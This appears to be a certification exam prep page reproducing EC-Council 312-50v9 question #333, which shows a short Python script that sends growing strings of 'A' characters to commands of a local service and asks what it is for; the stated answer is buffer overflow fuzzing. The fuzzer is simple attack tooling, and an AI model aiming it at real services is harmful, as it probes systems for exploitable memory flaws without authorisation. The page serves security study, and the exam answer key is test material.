EC-Council
312-50V9 · Question #333
312-50V9 Question #333: Real Exam Question with Answer & Explanation
The correct answer is A: Buffer Overflow. This Python script is a buffer overflow fuzzer that sends progressively larger payloads to multiple commands on a target service to identify which input causes a memory boundary violation.
Question
What is the code written for? #!/usr/bin/python import socket buffer=["A"] counter=50 while len(buffer)<=100: buffer.apend ("A"*counter) counter=counter+50 commands=["HELP","STATS.","RTIME.","LTIME.","SRUN.","TRUN.","GMON.","GD OG.","KSTET.","GTER.","HTER.","LTER.","KSTAN."] for command in commands: for buffstring in buffer: print "Exploiting" +command+":"+str(len(buffstring)) s=socket.socket(socket.AF_INET.socket.SOCK_STREAM) s.connect(('127.0.0.1',9999)) s.recv(50) s.send(command+buffstring) s.close()
Options
- ABuffer Overflow
- BEncryption
- CBruteforce
- DDenial-of-service (Dos)
Explanation
This Python script is a buffer overflow fuzzer that sends progressively larger payloads to multiple commands on a target service to identify which input causes a memory boundary violation.
Common mistakes.
- B. The script contains no cryptographic functions, key generation, or encoding/decoding logic associated with encryption.
- C. A brute-force attack cycles through possible credential combinations, whereas this script sends fixed repetitive characters ('A') of increasing length, which is fuzzing - not credential guessing.
- D. A denial-of-service attack aims to exhaust resources and disrupt availability, whereas this script targets memory safety vulnerabilities by sending oversized inputs to specific command handlers.
Concept tested. Buffer overflow fuzzing script identification
Reference. https://owasp.org/www-community/vulnerabilities/Buffer_Overflow
Community Discussion
No community discussion yet for this question.